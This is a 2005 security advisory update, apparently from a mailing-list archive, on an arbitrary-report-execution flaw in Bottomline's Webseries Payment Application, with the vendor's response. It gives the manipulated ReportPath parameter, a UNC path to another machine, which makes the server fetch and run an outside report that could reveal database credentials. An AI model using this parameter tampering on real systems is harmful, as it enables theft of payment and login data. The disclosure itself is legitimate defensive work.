<<< Date Index >>>     <<< Thread Index >>>

Portcullis Advisory 05-009 Update, Webseries Payment Application



Portcullis Security Advisory

AREAS UPDATED: VENDOR RESPONSE.

VENDOR RESPONSE:

The product vendor, Bottomline Technologies has provided Portcullis with
the following response to the security advisory. It should be noted that
the resolution of this issue has not been verified by Portcullis:

Bottomline acknowledge that there is a slight risk of exposure of data
via unauthorised report generation. In order to further enhance the
security of the system a service pack will be released in Q1 2005. This
ensures the reporting module no longer passes the path and report
information on the URL line. This information is kept on the server and
passed using the database and additionally the report being executed is
validated against the user entitlements.

Contact Bottomline at: support@xxxxxxxxxxxxxxxx  Tel: +44 (0)1189
258253.
 
Vulnerable System: 
      
Webseries Payment Application
 
Vulnerability Title:  
 
Execute Of Arbitrary Reports
 
Vulnerability discovery and development: 
 
Portcullis Security Testing Services
 
Affected systems: 
 
Bottomline Webseries Payment Application 
 
Details:
 
Portcullis consultants have discovered that by manipulating the values
of certain Variables used during report selection it was possible to
cause the application to download and execute arbitrary reports from any
machine on the network capable of supporting Windows shares.
 
In normal usage the Webseries application references report templates
located on the web server itself:
 
        ReportPath=E:\server\apps\WSWEB\Web+Application+Files\reports\
        ReportName=User%20Activity%20Report.rpt
 
When the value of the ReportPath variable is changed to contain a UNC
path referencing another machine on the network (as shown below), the
Webseries application appears to download and attempt to execute the
report.
 
        ReportPath=\\192.168.1.2\Shared\
        ReportName=Test.rpt
 
 
Impact:
 
A malicious user with knowledge of the structure of the backend database
could design a report template to disclose any information contained
within the database.  Portcullis consultants believe that it is possible
to create a report template that would display usernames and passwords
(in what ever form they are stored in the database)..
 
Exploit:
 
Exploit code not required.
 
Copyright: 
 
Copyright (c) Portcullis Computer Security Limited 2005, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
 
Disclaimer: 
 
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.



*************************************************************
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and do not
represent the opinion of the organisation. 
Access to this email by persons other than the intended
recipient is strictly prohibited.
If you are not the intended recipient, any disclosure, copying,
distribution or other action taken or omitted to be taken in
reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice contained
in this email is subject to the terms and conditions expressed
in the applicable Portcullis Computer Security Limited terms
of business.
**************************************************************